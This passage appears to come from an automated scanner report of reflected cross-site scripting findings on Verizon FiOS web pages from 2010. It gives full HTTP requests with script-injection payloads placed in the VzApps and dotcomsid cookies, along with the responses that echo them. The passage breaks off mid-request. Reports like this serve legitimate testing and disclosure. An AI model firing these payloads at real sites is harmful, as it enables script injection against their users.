The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c19d5'><script>alert(1)</script>36277642c37 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc19d5'><script>alert(1)</script>36277642c37; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150436
Expires: Sat, 20 Nov 2010 03:00:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:51 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC19D5'><SCRIPT>ALERT(1)</SCRIPT>36277642C37 ' />
...[SNIP]...

2.973. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29ff7"-alert(1)-"213bd3ed367 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=29ff7"-alert(1)-"213bd3ed367; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 161440
Expires: Sat, 20 Nov 2010 03:00:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:39 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "29ff7"-alert(1)-"213bd3ed367"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.974. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f06b1'><script>alert(1)</script>fc2813f1a29 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf06b1'><script>alert(1)</script>fc2813f1a29; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110632
Expires: Sat, 20 Nov 2010 02:55:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:34 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=TXf06b1'><script>alert(1)</script>fc2813f1a29; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF06B1'><SCRIPT>ALERT(1)</SCRIPT>FC2813F1A29 ' />
...[SNIP]...

2.975. https://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b10ba"-alert(1)-"93515101fac was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=b10ba"-alert(1)-"93515101fac; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115390
Expires: Sat, 20 Nov 2010 02:55:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "b10ba"-alert(1)-"93515101fac"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.976. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dcef1'><script>alert(1)</script>614ae10fb65 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
